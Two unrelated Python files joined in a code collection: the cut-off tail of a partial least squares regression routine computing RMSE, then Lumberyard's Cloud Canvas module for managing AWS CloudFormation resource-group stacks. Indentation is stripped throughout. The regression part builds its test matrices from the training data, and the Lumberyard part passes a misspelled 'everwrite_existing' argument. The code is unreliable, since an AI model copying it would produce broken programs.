q_new_dictionary[i] = q_new
u = np.dot(Y,q_new.T)/np.dot(q_new,q_new.T) #Step 7
#Step 8: Check convergence
#Calculate the X loadings and rescale the scores and weights accordingly
p = np.dot(t.T,X)/np.dot(t.T,t) #Step 9
p_new = p.T/np.linalg.norm(p.T) #Step 10
t_new = t/np.linalg.norm(p.T) #Step 11
w_new = w_old/np.linalg.norm(p) #Step 12
#Find the regression coefficient for b for th inner relation
b = np.dot(u.T,t_new)/np.dot(t.T,t) #Step 13
b_dictionary[i] = b
#Calculation of the residuals
E_h = X - np.dot(t_new,p_new.T)
F_h = Y - b.dot(t_new.T).T.dot(q)
#Set outer relation for the X block
Xres_dictionary[i] = E_h
X = E_h
#Set the mixed relation for the Y block
Yres_dictionary[i] = F_h
Y = F_h
#Find estimated t hat
t_hat = np.dot(E_h,w_new.T)
t_hat_dictionary[i] = t_hat
E_h = E_h - np.dot(t_hat,p_new.T)
#Predict training set response by summing over different compenents
E_h = X
for j in range(1,i+1):
t_hat_train = np.dot(E_h,w_new.T)
t_hat_train_dictionary[j] = t_hat_train
E_h = E_h - np.dot(t_hat_train, p_new.T)
for g in range(1,i+1):
Y_pred = Y_pred + (b_dictionary[g]*t_hat_dictionary[g]).dot(q_new_dictionary[g].T)
#Find training RMSE
RMSE = np.sqrt(sum((Y_true - Y_pred)**2)/Y_true.shape[0])
RMSE_scaled = RMSE * response_std
RMSE_dictionary[i] = RMSE_scaled
#Code chunk to find test RMSE
#Load data
data_test = pd.DataFrame.from_csv(path_test)
combined.append(response)
data_test = data_test[combined]
response_std_test = data_test[response].std()
#Subtract the mean from each column
data_test = data_test - data_test.mean()
#Scale each column by the column standard deviation
data_test = data_test/data_test.std()
#Separate in to design matrix (X block) and response column vector (Y block)
predictors.pop()
X_test = data[predictors].as_matrix()
Y_test = data[[response]].as_matrix()
Y_true_test = Y_test #For prediction
Y_pred_test = np.zeros((Y_true_test.shape[0],1))
#Get rank of matrix
rank_test = np.linalg.matrix_rank(X)
E_h_test = X_test
#Sum over different compenents
for k in range(1,i+1):
t_hat_test = np.dot(E_h_test,w_new.T)
t_hat_test_dictionary[k] = t_hat_test
E_h_test = E_h_test - np.dot(t_hat_test, p_new.T)
Y_pred_test = Y_pred_test + (b_dictionary[k]*t_hat_test_dictionary[k]).dot(q_new_dictionary[k].T)
#Find test RMSE
RMSE = np.sqrt(sum((Y_true_test - Y_pred_test)**2)/Y_true_test.shape[0])
RMSE_scaled_test = RMSE * response_std_test # I believe this is the RMSE since the Y had to be scaled.
RMSE_test_dictionary[i] = RMSE_scaled_test
return RMSE_dictionary, RMSE_test_dictionary
|
<reponame>kostenickj/lumberyard
#
# All or portions of this file Copyright (c) Amazon.com, Inc. or its affiliates or
# its licensors.
#
# For complete copyright and license terms please see the LICENSE at the root of this
# distribution (the "License"). All use of this software is governed by the License,
# or, if provided, by the license below or the license accompanying this file. Do not
# remove or modify any license notices. This file is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#
# $Revision: #1 $
from errors import HandledError
import os
import util
import json
import copy
from resource_manager_common import constant,service_interface
from config import ResourceTemplateAggregator
import time
import file_util
import mappings
import project
import security
import common_code
from deployment_tags import DeploymentTag
from botocore.exceptions import NoCredentialsError
from uploader import ProjectUploader, ResourceGroupUploader, Phase
class ResourceGroup(object):
def __init__(self, context, resource_group_name, directory_path, cpp_base_directory_path, cpp_aws_directory_path, gem = None):
'''Initialize an ResourceGroup object.'''
self.__context = context
self.__name = resource_group_name
self.__directory_path = directory_path
self.__cpp_aws_directory_path = cpp_aws_directory_path
self.__cpp_base_directory_path = cpp_base_directory_path
self.__gem = gem
self.__template_path = os.path.join(self.__directory_path, constant.RESOURCE_GROUP_TEMPLATE_FILENAME)
self.__template = None
self.__cli_plugin_code_path = os.path.join(self.__directory_path, 'cli-plugin-code')
self.__cgp_code_path = os.path.join(self.__directory_path, constant.GEM_CGP_DIRECTORY_NAME)
self.__base_settings_file_path = os.path.join(self.__directory_path, constant.RESOURCE_GROUP_SETTINGS)
self.__game_project_extensions_path = os.path.join(self.__context.config.game_directory_path, 'AWS', 'resource-group', self.__name)
self.__game_settings_file_path = os.path.join(self.__game_project_extensions_path, constant.RESOURCE_GROUP_SETTINGS)
self.__base_settings = None
self.__game_settings = None
@property
def name(self):
return self.__name
@property
def is_enabled(self):
return self.name not in self.__context.config.local_project_settings.get(constant.DISABLED_RESOURCE_GROUPS_KEY, [])
def enable(self):
if not self.is_enabled:
list = self.__context.config.local_project_settings.setdefault(constant.DISABLED_RESOURCE_GROUPS_KEY, [])
if self.name in list:
list.remove(self.name)
self.__context.config.local_project_settings.save()
def disable(self):
if self.is_enabled:
list = self.__context.config.local_project_settings.setdefault(constant.DISABLED_RESOURCE_GROUPS_KEY, [])
if self.name not in list:
list.append(self.name)
self.__context.config.local_project_settings.save()
@property
def directory_path(self):
return self.__directory_path
@property
def cpp_aws_directory_path(self):
return self.__cpp_aws_directory_path
@property
def cpp_base_directory_path(self):
return self.__cpp_base_directory_path
@property
def is_gem(self):
return self.__gem is not None
@property
def gem(self):
return self.__gem
def verify_gem_enabled(self):
if self.gem:
if not self.gem.is_defined:
raise HandledError('The resource group {resource_group_name} relies on a gem from {gem_path} which does not exist.'.format(
resource_group_name = self.name,
gem_path = self.gem.root_directory_path))
if not self.gem.is_enabled:
raise HandledError('The resource group {resource_group_name} relies on gem {gem_name} version {gem_version} (from {gem_path}) which is not enabled for the project. Please enable the gem {gem_name} in the project configurator.'.format(
resource_group_name = self.name,
gem_name = self.gem.name,
gem_version = self.gem.version,
gem_path = self.gem.root_directory_path))
@property
def template_path(self):
return self.__template_path
@property
def template(self):
if self.__template is None:
self.__template = ResourceTemplateAggregator(self.__context, self.__directory_path, self.__game_project_extensions_path).effective_template
return self.__template
def effective_template(self, deployment_name):
template = self.template
tags = DeploymentTag(deployment_name, self.__context)
return tags.apply_overrides(self)
def get_inter_gem_dependencies(self):
dependencies = []
for resource_name, definition in self.template.get("Resources", {}).iteritems():
if not definition["Type"] == "Custom::LambdaConfiguration":
continue
services = definition.get("Properties", {}).get("Services", [])
for service in services:
target_gem_name, target_interface_name, target_interface_version = service_interface.parse_interface_id(service["InterfaceId"])
dependencies.append({
"gem": target_gem_name,
"id": service["InterfaceId"],
"function": definition.get("Properties", {}).get("FunctionName", "")
})
return dependencies
def get_template_with_parameters(self, deployment_name):
resource_group_template = self.effective_template(deployment_name)
# override default parameter values if a deployment is speciified
if deployment_name:
project_settings = self.__context.config.project_settings
default_resource_group_settings = project_settings.get_default_resource_group_settings()
resource_group_settings = project_settings.get_resource_group_settings(deployment_name)
resource_group_default_parameters = self.__find_setting(default_resource_group_settings, self.name, 'parameter')
resource_group_parameters = self.__find_setting(resource_group_settings, self.name, 'parameter')
if 'Parameters' in resource_group_template:
resource_group_template_parameters = resource_group_template['Parameters']
for paramName, paramValue in resource_group_template_parameters.iteritems():
newParamValue = self.__find_setting(resource_group_parameters, paramName)
if newParamValue == None:
newParamValue = self.__find_setting(resource_group_default_parameters, paramName)
if newParamValue != None:
resource_group_template_parameters[paramName]['Default'] = newParamValue
return resource_group_template
def __find_setting(self, dictionary, *levels):
if dictionary == None:
return None
current = dictionary
for level in levels:
if level in current:
current = current[level]
else:
return None
return current
def save_template(self):
self.__context.config.save_json(self.template_path, self.template)
@property
def cli_plugin_code_path(self):
return self.__cli_plugin_code_path
@property
def cgp_code_path(self):
return self.__cgp_code_path
def update_cgp_code(self, resource_group_uploader):
content_path = os.path.join(self.cgp_code_path, "dist")
if not os.path.isdir(content_path):
return
resource_group_uploader.upload_dir(None, content_path, alternate_root=constant.GEM_CGP_DIRECTORY_NAME, suffix='dist')
@property
def base_settings_file_path(self):
return self.__base_settings_file_path
@property
def game_settings_file_path(self):
return self.__game_settings_file_path
def get_stack_id(self, deployment_name, optional = False):
return self.__context.config.get_resource_group_stack_id(deployment_name, self.name, optional = optional)
def get_stack_parameters(self, deployment_name, uploader = None):
if deployment_name:
deployment_stack_arn = self.__context.config.get_deployment_stack_id(deployment_name, optional = True)
else:
deployment_stack_arn = None
return {
'ConfigurationBucket' : uploader.bucket if uploader else None,
'ConfigurationKey': uploader.key if uploader else None,
'ProjectResourceHandler': self.__context.config.project_resource_handler_id if self.__context.config.project_initialized else None,
'DeploymentStackArn': deployment_stack_arn,
'DeploymentName': deployment_name,
'ResourceGroupName': self.name
}
def get_pending_resource_status(self, deployment_name):
if deployment_name:
resource_group_stack_id = self.get_stack_id(deployment_name, optional = True)
else:
resource_group_stack_id = None
template = self.get_template_with_parameters(deployment_name)
parameters = self.get_stack_parameters(deployment_name, uploader = None)
lambda_function_content_paths = []
resources = self.template["Resources"]
for name, description in resources.iteritems():
if not description["Type"] == "AWS::Lambda::Function":
continue
code_path, imported_paths, multi_imports = ResourceGroupUploader.get_lambda_function_code_paths(self.__context, self.name, name)
lambda_function_content_paths.append(code_path)
lambda_function_content_paths.extend(imported_paths)
# TODO: need to support swagger.json IN the lambda directory.
service_api_content_paths = [ os.path.join(self.directory_path, 'swagger.json') ]
# TODO: get_pending_resource_status's new_content_paths parameter needs to support
# a per-resource mapping instead of an per-type mapping. As is, a change in any lambda
# directory makes all lambdas look like they need to be updated.
return self.__context.stack.get_pending_resource_status(
resource_group_stack_id,
new_template = template,
new_parameter_values = parameters,
new_content_paths = {
'AWS::Lambda::Function': lambda_function_content_paths,
'Custom::ServiceApi': service_api_content_paths
},
is_enabled = self.is_enabled
)
def add_output(self, logical_id, description, value, force=False):
'''Adds an output to a resource group's resource-template.json file.
Args:
logical_id: the name of the output
description: a description of the output
value: the output value. May be of the form { "Ref": "..." } or
{ "Gn::GetAtt": [ "...", "..." ] } or any other construct allowed
by Cloud Formation.
force (named): Determine if existing definitions are replaced. Default
is False.
Returns:
True if a change was made.
'''
changed = False
outputs = util.dict_get_or_add(self.template, 'Outputs', {})
if logical_id not in outputs or force:
self.__context.view.adding_output(self.template_path, logical_id)
outputs[logical_id] = {
'Description': description,
'Value': value
}
changed = True
else:
self.__context.view.output_exists(self.template_path, logical_id)
return changed
def remove_output(self, logical_id):
'''Removes an output to a resource group's resource-template.json file.
Args:
logical_id: the name of the output
Returns:
True if a change was made.
'''
changed = False
outputs = util.dict_get_or_add(self.template, 'Outputs', {})
if logical_id in outputs:
self.__context.view.removing_output(self.template_path, logical_id)
del outputs[logical_id]
changed = True
else:
self.__context.view.output_not_found(self.template_path, logical_id)
return changed
def add_resources(self, resource_definitions, force=False, dependencies=None):
'''Adds resource definitions to a resource group's resource-template.json file.
Args:
resource_definitions: dictionary containing resource definitions.
force (named): indicates if resource and parameter definitions replace existing definitions. Default is False.
dependencies (named): a dictionary that provides updates to the DepondsOn property of existing resources:
{
'<dependent-resource-name>': [ '<dependency-resource-name>', ... ],
...
}
resutls in:
"<dependent-resource-name>": {
"DependsOn": [ "<dependency-resource-name>" ]
...
}
Returns:
True if any definitions were added.
'''
changed = False
if dependencies is None:
dependencies = {}
resources = util.dict_get_or_add(self.template, 'Resources', {})
for resource_name, resource_definition in resource_definitions.iteritems():
if resource_name in resources and not force:
self.__context.view.resource_exists(self.template_path, resource_name)
else:
self.__context.view.adding_resource(self.template_path, resource_name)
resources[resource_name] = resource_definition
if self.__has_access_control_metadata(resource_definition):
dependency_list = dependencies.setdefault('AccessControl', [])
dependency_list.append(resource_name)
changed = True
if dependencies:
for dependent_name, dependency_list in dependencies.iteritems():
if dependent_name == 'AccessControl':
dependent_definition = resources.setdefault('AccessControl', security.DEFAULT_ACCESS_CONTROL_RESOURCE_DEFINITION)
else:
dependent_definition = resources.get(dependent_name)
if dependent_definition is None:
raise ValueError('The dependent resource {} does not exist.'.format(dependent_name))
dependencies = dependent_definition.setdefault('DependsOn', [])
if not isinstance(dependencies, type([])):
dependencies = [ dependencies ]
dependent_definition['DependsOn'] = dependencies
if not isinstance(dependency_list, type([])):
dependency_list = [ dependency_list ]
dependencies.extend(set(dependency_list))
return changed
def __has_access_control_metadata(self, resource_definition):
return util.get_cloud_canvas_metadata(resource_definition, 'Permissions') or util.get_cloud_canvas_metadata(resource_definition, 'RoleMappings')
def remove_resources(self, resource_names):
'''Removes resource definitions from a resource group's resource-template.json file.
Args:
resource_names: list containing resource names.
Returns:
True if any definitions were removed.
'''
changed = False
resources = util.dict_get_or_add(self.template, 'Resources', {})
for resource_name in resource_names:
if resource_name not in resources:
self.__context.view.resource_not_found(self.template_path, resource_name)
else:
self.__context.view.removing_resource(self.template_path, resource_name)
del resources[resource_name]
changed = True
for resource_definition in resources.values():
depends_on = resource_definition.get('DependsOn')
if depends_on:
if isinstance(depends_on, type([])):
for resource_name in resource_names:
while resource_name in depends_on:
depends_on.remove(resource_name)
changed = True
else:
if depends_on in resource_names:
resource_definition['DependsOn'] = []
changed = True
return changed
def add_parameters(self, parameter_definitions, force=False):
'''Adds resource and parameter definitions to a resource group's resource-template.json file.
Args:
parameter_definitions: dictionary containing parameter definitions.
force (named): indicates if resource and parameter definitions replace existing definitions. Default is False.
Returns:
True if any definitions were added.
'''
changed = False
parameters = util.dict_get_or_add(self.template, 'Parameters', {})
for parameter_name, parameter_definition in parameter_definitions.iteritems():
if parameter_name in parameters and not force:
self.__context.view.parameter_exists(self.template_path, parameter_name)
else:
self.__context.view.adding_parameter(self.template_path, parameter_name)
parameters[parameter_name] = parameter_definition
changed = True
return changed
def remove_parameters(self, parameter_names):
'''Removes resource and parameter definitions from a resource group's resource-template.json file.
Args:
parameter_names: list containing parameter names.
Returns:
True if any definitions were removed.
'''
changed = False
parameters = util.dict_get_or_add(self.template, 'Parameters', {})
for parameter_name in parameter_names:
if parameter_name not in parameters:
self.__context.view.parameter_not_found(self.template_path, parameter_name)
else:
self.__context.view.removing_parameter(self.template_path, parameter_name)
del parameters[parameter_name]
changed = True
return changed
def copy_directory(self, source_path, relative_destination_path = '.', force=False):
'''Adds a copy of the contents of a directory to a resource group. Subdirectories are recursively merged.
Arguments:
source_path: the directory to copy.
relative_destination_path (named): the name of the resource group relative directory
where the source directory contents will be copied. Defaults to the resource group
directory itself.
force (named): if True, overwrite destination files that already exists.
The default is False.
'''
destination_path = os.path.abspath(os.path.join(self.directory_path, relative_destination_path))
file_util.copy_directory_content(self.__context, destination_path, source_path, overwrite_existing = force)
def copy_file(self, source_path, relative_destination_path, force=False):
'''Adds a copy of a file to a resource group.
Arguments:
source_path - path and name of the file to copy.
relative_destination_path - path and name of the destination file, relative to the
resource group directory.
force (named) - if True, existing files will be overwitten. Default is False.
'''
destination_path = os.path.abspath(os.path.join(self.directory_path, relative_destination_path))
file_util.copy_file(self.__context, destination_path, source_path, everwrite_existing = force)
def create_file(self, relative_destination_path, initial_content, force=False):
'''Creates a file in a resource group.
Args:
relative_destination_path: the path and name of the file relative to
the resource group directory.
initial_content: The file's initial content.
force (named): Overwite existing files. Default is False.
Returns:
True if the file was created.
'''
destination_path = os.path.join(self.directory_path, relative_destination_path)
return file_util.create_ignore_filter_function(self.__context, destination_path, initial_content, overwrite_existing = force)
def get_base_settings(self):
if self.__base_settings is None:
self.__base_settings = self.__context.config.load_json(self.__base_settings_file_path)
return self.__base_settings
def add_aggregate_settings(self, context):
if context.config.aggregate_settings != None:
settings_data = self.get_base_settings()
if settings_data:
context.config.aggregate_settings[self.name] = settings_data
def get_game_settings(self):
if self.__game_settings is None:
self.__game_settings = self.__context.config.load_json(self.__game_settings_file_path)
return self.__game_settings
def get_editor_setting(self, setting_name, preference = 'game_or_base'):
base_settings = self.get_base_settings()
game_settings = self.get_game_settings()
setting = None
if preference == 'game_or_base':
setting = game_settings.get(setting_name)
if setting is None:
setting = base_settings.get(setting_name)
elif preference == 'base_or_game':
setting = base_settings.get(setting_name)
if setting is None:
setting = game_settings.get(setting_name)
elif preference == 'base':
setting = base_settings.get(setting_name)
elif preference == 'game':
setting = game_settings.get(setting_name)
return setting
def enable(context, args):
group = context.resource_groups.get(args.resource_group)
if group.is_enabled:
raise HandledError('The {} resource group is not disabled.'.format(group.name))
util.validate_writable_list(context, [ context.config.local_project_settings.path ])
group.enable()
context.view.resource_group_enabled(group.name)
def disable(context, args):
group = context.resource_groups.get(args.resource_group)
if not group.is_enabled:
raise HandledError('The {} resource group is not enabled.'.format(group.name))
util.validate_writable_list(context, [ context.config.local_project_settings.path ])
group.disable()
context.view.resource_group_disabled(group.name)
def add(context, args):
# Old functionality, which created project local resource group directories, was deprcated
# in Lumberyard 1.11 (CGF 1.1.1). The new "gem create" or "resource-group enable" commands
# should be used instead.
#
# This command approximates the old behavior by either executing gem create or enabling
# a resource group if it exists but was disabled.
if not args.is_gui:
context.view.using_deprecated_command('resource-group add', ['cloud-gem create', 'cloud-gem enable'])
if args.resource_group in context.config.local_project_settings.get(constant.DISABLED_RESOURCE_GROUPS_KEY, []):
enable(context, util.Args(resource_group = args.resource_group))
else:
context.gem.create_gem(
gem_name = args.resource_group,
initial_content = 'api-lambda-dynamodb' if args.include_example_resources else 'no-resources',
enable = True,
asset_only = True)
def remove(context, args):
# Deprecated in Lumberyard 1.11 (CGF 1.1.1).
if not args.is_gui:
context.view.using_deprecated_command('resource-group remove', 'cloud-gem disable')
group = context.resource_groups.get(args.resource_group)
if group.is_gem:
context.gem.disable_gem(gem_name = args.resource_group)
else:
disable(context, args)
def update_stack(context, args):
deployment_name = args.deployment
resource_group_name = args.resource_group
# Use default deployment if necessary
if deployment_name is None:
if context.config.default_deployment is None:
raise HandledError('No default deployment has been set. Provide the --deployment parameter or use the default-deployment command to set a default deployment.')
deployment_name = context.config.default_deployment
# Get needed data, verifies the resource group stack exists
resource_group = context.resource_groups.get(resource_group_name)
resource_group_stack_id = resource_group.get_stack_id(deployment_name)
pending_resource_status = resource_group.get_pending_resource_status(deployment_name)
# Is it ok to do this?
capabilities = context.stack.confirm_stack_operation(
resource_group_stack_id,
'deployment {} resource group {}'.format(deployment_name, resource_group_name),
args,
pending_resource_status
)
# Update the stack...
project_uploader = ProjectUploader(context)
deployment_uploader = project_uploader.get_deployment_uploader(deployment_name)
resource_group_uploader, resource_group_template_url = before_update(
deployment_uploader,
resource_group_name
)
parameters = resource_group.get_stack_parameters(
deployment_name,
uploader = resource_group_uploader
)
# wait a bit for S3 to help insure that templates can be read by cloud formation
time.sleep(constant.STACK_UPDATE_DELAY_TIME)
context.stack.update(
resource_group_stack_id,
resource_group_template_url,
parameters = parameters,
pending_resource_status = pending_resource_status,
capabilities = capabilities
)
after_update(deployment_uploader, resource_group_name)
# Deprecated in 1.9 - TODO remove
context.hooks.call_module_handlers('cli-plugin-code/resource_group_hooks.py', 'on_post_update',
args=[deployment_name, resource_group_name],
deprecated=True
)
def create_stack(context, args):
# Does a "safe" create of a resource group stack. The existing deployment
# template is modified to add the stack and config resources and used
# to update the deployment stack. This prevents unexpected changes to other
# resource groups as a side effect of the deployment update.
resource_group = context.resource_groups.get(args.resource_group)
pending_resource_status = resource_group.get_pending_resource_status(args.deployment)
# Is it ok to do this?
capabilities = context.stack.confirm_stack_operation(
None, # stack id
'deployment {} resource group {}'.format(args.deployment, args.resource_group),
args,
pending_resource_status
)
# Do the create...
project_uploader = ProjectUploader(context)
deployment_uploader = project_uploader.get_deployment_uploader(args.deployment)
before_update(
deployment_uploader,
args.resource_group
)
context.view.processing_template('{} deployment'.format(args.deployment))
deployment_stack_id = context.config.get_deployment_stack_id(args.deployment)
deployment_template = context.stack.get_current_template(deployment_stack_id)
deployment_parameters = context.stack.get_current_parameters(deployment_stack_id)
deployment_resources = deployment_template.get('Resources', {})
effective_deployment_resources = context.config.deployment_template_aggregator.effective_template.get('Resources',{})
resource_group_stack_resource = deployment_resources.get(args.resource_group, None)
if resource_group_stack_resource is None:
resource_group_stack_resource = copy.deepcopy(effective_deployment_resources.get(args.resource_group, {}))
deployment_resources[args.resource_group] = resource_group_stack_resource
resource_group_config_name = args.resource_group + 'Configuration'
resource_group_config_resource = deployment_resources.get(resource_group_config_name, None)
if resource_group_config_resource is None:
resource_group_config_resource = copy.deepcopy(effective_deployment_resources.get(resource_group_config_name, {}))
resource_group_config_resource.get('Properties', {})['ConfigurationKey'] = deployment_uploader.key
deployment_resources[resource_group_config_name] = resource_group_config_resource
if 'EmptyDeployment' in deployment_resources:
del deployment_resources['EmptyDeployment']
deployment_template_url = deployment_uploader.upload_content(constant.DEPLOYMENT_TEMPLATE_FILENAME, json.dumps(deployment_template),
'deployment template with resource group definitions')
# wait a bit for S3 to help insure that templates can be read by cloud formation
time.sleep(constant.STACK_UPDATE_DELAY_TIME)
try:
context.stack.update(
deployment_stack_id,
deployment_template_url,
deployment_parameters,
pending_resource_status = __nest_pending_resource_status(args.deployment, pending_resource_status),
capabilities = capabilities
)
except:
context.config.force_gui_refresh()
raise
context.config.force_gui_refresh()
context.view.resource_group_stack_created(args.deployment, args.resource_group)
after_update(deployment_uploader, args.resource_group)
# Deprecated in 1.9 - TODO remove
context.hooks.call_module_handlers('cli-plugin-code/resource_group_hooks.py', 'on_post_update',
args=[args.deployment, args.resource_group],
deprecated=True
)
def delete_stack(context, args):
resource_group_stack_id = context.config.get_resource_group_stack_id(args.deployment, args.resource_group)
pending_resource_status = context.stack.get_pending_resource_status(
resource_group_stack_id,
new_template = {}
)
# Is it ok to do this?
capabilities = context.stack.confirm_stack_operation(
None, # stack id
'deployment {} resource group {}'.format(args.deployment, args.resource_group),
args,
pending_resource_status
)
# Does a "safe" delete of a resource group stack. The existing deployment
# template is modified to remove the stack and config resources and used
# to update the deployment. This prevents unexpected changes to other resource
# groups as a side effect of the deployment update.
project_uploader = ProjectUploader(context)
deployment_uploader = project_uploader.get_deployment_uploader(args.deployment)
context.view.processing_template('{} deployment'.format(args.deployment))
deployment_stack_id = context.config.get_deployment_stack_id(args.deployment)
deployment_template = context.stack.get_current_template(deployment_stack_id)
deployment_parameters = context.stack.get_current_parameters(deployment_stack_id)
deployment_resources = deployment_template.get('Resources', {})
resource_group_stack_resource = deployment_resources.get(args.resource_group, None)
if resource_group_stack_resource is not None:
del deployment_resources[args.resource_group]
resource_group_config_resource = deployment_resources.get(args.resource_group + 'Configuration', None)
if resource_group_config_resource is not None:
del deployment_resources[args.resource_group + 'Configuration']
if resource_group_stack_resource is None and resource_group_config_resource is None:
raise HandledError('Definitions for {} resource group related resources where not found in the current {} deployment template.'.format(args.resource_group, args.deployment))
if not deployment_resources:
deployment_resources['EmptyDeployment'] = {
"Type": "Custom::EmptyDeployment",
"Properties": {
"ServiceToken": { "Ref": "ProjectResourceHandler" }
}
}
deployment_template_url = deployment_uploader.upload_content(constant.DEPLOYMENT_TEMPLATE_FILENAME, json.dumps(deployment_template),
'deployment template without resource group definitions')
resource_group_stack_id = context.stack.get_physical_resource_id(deployment_stack_id, args.resource_group)
# wait a bit for S3 to help insure that templates can be read by cloud formation
time.sleep(constant.STACK_UPDATE_DELAY_TIME)
# Tell stack.update that a child stack is being deleted so that it
# cleans up any resources that stack contains.
pending_resource_status = {
args.resource_group: {
'OldDefinition': {
'Type': 'AWS::CloudFormation::Stack'
},
'PendingAction': context.stack.PENDING_DELETE
}
}
try:
context.stack.update(
deployment_stack_id,
deployment_template_url,
deployment_parameters,
pending_resource_status = pending_resource_status,
capabilities = capabilities
)
except:
context.config.force_gui_refresh()
raise
context.config.force_gui_refresh()
context.view.resource_group_stack_deleted(args.deployment, args.resource_group)
def __nest_pending_resource_status(deployment_name, pending_resource_status):
return { deployment_name + '.' + k:v for k,v in pending_resource_status.iteritems() }
def before_update(deployment_uploader, resource_group_name):
context = deployment_uploader.context
deployment_name = deployment_uploader.deployment_name
resource_group_uploader = deployment_uploader.get_resource_group_uploader(resource_group_name)
group = context.resource_groups.get(resource_group_name)
context.view.processing_template('{} resource group'.format(resource_group_name))
group.add_aggregate_settings(context)
resource_group_template_with_parameters = group.get_template_with_parameters(deployment_name)
resource_group_template_url = resource_group_uploader.upload_content(
constant.RESOURCE_GROUP_TEMPLATE_FILENAME,
json.dumps(resource_group_template_with_parameters, indent=4, sort_keys=True),
'processed resource group template')
__zip_individual_lambda_code_folders(
group, resource_group_uploader, deployment_name)
# Deprecated in 1.9. TODO: remove.
resource_group_uploader.execute_uploader_pre_hooks()
context.hooks.call_single_module_handler('resource-manager-code/update.py', 'before_this_resource_group_updated', resource_group_name,
kwargs = {
'deployment_name': deployment_name,
'resource_group_name': resource_group_name,
'resource_group_uploader': resource_group_uploader
}
)
context.hooks.call_module_handlers('resource-manager-code/update.py', 'before_resource_group_updated',
kwargs = {
'deployment_name': deployment_name,
'resource_group_name': resource_group_name,
'resource_group_uploader': resource_group_uploader
}
)
return (resource_group_uploader, resource_group_template_url)
def after_update(deployment_uploader, resource_group_name):
context = deployment_uploader.context
deployment_name = deployment_uploader.deployment_name
group = context.resource_groups.get(resource_group_name)
resource_group_uploader = deployment_uploader.get_resource_group_uploader(resource_group_name)
group.update_cgp_code(resource_group_uploader)
# Deprecated in 1.9 - TODO remove
resource_group_uploader.execute_uploader_post_hooks()
context.hooks.call_single_module_handler('resource-manager-code/update.py', 'after_this_resource_group_updated', resource_group_name,
kwargs = {
'deployment_name': deployment_name,
'resource_group_name': resource_group_name,
'resource_group_uploader': resource_group_uploader
}
)
context.hooks.call_module_handlers('resource-manager-code/update.py', 'after_resource_group_updated',
kwargs = {
'deployment_name': deployment_name,
'resource_group_name': resource_group_name,
'resource_group_uploader': resource_group_uploader
}
)
def __zip_individual_lambda_code_folders(group, uploader, deployment_name):
resources = group.effective_template(deployment_name)["Resources"]
for name, description in resources.iteritems():
if not description["Type"] == "Custom::LambdaConfiguration":
continue
uploader.zip_and_upload_lambda_function_code(description["Properties"]["FunctionName"])
def list(context, args):
resource_groups = []
for group in context.resource_groups.values():
resource_group_description = {
'Name': group.name,
'ResourceGroupTemplateFilePath': group.template_path,
'CliPluginCodeDirectoryPath': group.cli_plugin_code_path,
'CGPResourceCodePath': group.cgp_code_path,
'BaseSettingsFilePath': group.base_settings_file_path,
'GameSettingsFilePath': group.game_settings_file_path,
'Enabled': group.is_enabled
}
resource_group_description['LambdaFunctionCodeDirectoryPaths'] = __gather_additional_code_directories(context, group)
resource_groups.append(resource_group_description)
stack_checked = False
deployment_name = None
if context.config.project_initialized:
deployment_name = args.deployment or context.config.default_deployment
if deployment_name is not None:
deployment_stack_id = context.config.get_deployment_stack_id(deployment_name)
try:
resources = context.stack.describe_resources(deployment_stack_id, recursive=False)
except NoCredentialsError:
resources = {}
for resource_group in resource_groups:
resource = resources.get(resource_group['Name'], None)
if resource is None:
if resource_group['Enabled']:
resource = {
'ResourceStatus': '',
'PendingAction': context.stack.PENDING_CREATE,
'PendingReason': context.stack.PENDING_CREATE_REASON
}
else:
resource = {
'ResourceStatus': 'DISABLED'
}
else:
if not resource_group['Enabled']:
resource.update(
{
'PendingAction': context.stack.PENDING_DELETE,
'PendingReason': 'The resource group is not enabled.'
})
resource_group.update(resource)
# find stack resources in deployment stack that don't exist in the template
for name, resource in resources.iteritems():
if resource['ResourceType'] == 'AWS::CloudFormation::Stack':
found = False
for resource_group in resource_groups:
if resource_group['Name'] == name:
found = True
break
if not found:
resource['Name'] = name
resource.update(
{
'Name': name,
'PendingAction': context.stack.PENDING_DELETE,
'PendingReason': context.stack.PENDING_DELETE_REASON
}
)
resource_groups.append(resource)
stack_checked = True
if not stack_checked:
for resource_group in resource_groups:
if resource_group['Enabled']:
resource = {
'ResourceStatus': '',
'PendingAction': context.stack.PENDING_CREATE,
'PendingReason': context.stack.PENDING_CREATE_REASON
}
else:
resource = {
'ResourceStatus': 'DISABLED',
}
resource_group.update(resource)
context.view.resource_group_list(deployment_name, resource_groups)
def __gather_additional_code_directories(context, group):
additional_dirs = []
# do any individual folders exist?
for name, description in group.template.get("Resources", {}).iteritems():
if description == None: # This can happen with a malformed template
continue
if not description.get("Type", "") == "AWS::Lambda::Function":
continue
code_path = ResourceGroupUploader.get_lambda_function_code_path(context, group.name, name)
additional_dirs.append(code_path)
# TODO: should this list include common-code directories as well?
return additional_dirs
def describe_stack(context, args):
stack_id = context.config.get_resource_group_stack_id(args.deployment, args.resource_group, optional=True)
group = context.resource_groups.get(args.resource_group, optional=True)
if(stack_id is None):
if group.is_enabled:
stack_description = {
'StackStatus': '',
'PendingAction': context.stack.PENDING_CREATE,
'PendingReason': context.stack.PENDING_CREATE_REASON
}
else:
stack_description = {
'StackStatus': 'DISABLED'
}
else:
stack_description = context.stack.describe_stack(stack_id)
if not group:
stack_description.update(
{
'PendingAction': context.stack.PENDING_DELETE,
'PendingReason': context.stack.PENDING_DELETE_REASON
}
)
else:
if not group.is_enabled:
stack_description.update(
{
'PendingAction': context.stack.PENDING_DELETE,
'PendingReason': 'The resource group is not enabled.'
}
)
user_defined_resource_count = 0
this_template = {}
if group:
this_template = group.template
for key, resource in this_template.get('Resources', {}).iteritems():
if key != 'AccessControl':
user_defined_resource_count += 1
context.view.resource_group_stack_description(args.deployment, args.resource_group, stack_description, user_defined_resource_count)
def list_parameters(context, args):
if not context.config.project_initialized:
raise HandledError('A project stack must be created before parameters can be listed.')
project_settings = context.config.project_settings
parameters = []
for deployment_name, deployment_settings in project_settings.get('deployment', {}).iteritems():
if not args.deployment or deployment_name == args.deployment or deployment_name == '*':
for resource_group_name, resource_group_settings in deployment_settings.get('resource-group', {}).iteritems():
if not args.resource_group or resource_group_name == args.resource_group or resource_group_name == '*':
for parameter_name, parameter_value in resource_group_settings.get('parameter', {}).iteritems():
if not args.parameter or parameter_name == args.parameter:
parameters.append(
{
'parameter_name': parameter_name,
'parameter_value': parameter_value,
'deployment_name': deployment_name,
'resource_group_name': resource_group_name
})
context.view.parameter_list(parameters)
def set_parameter(context, args):
if not context.config.project_initialized:
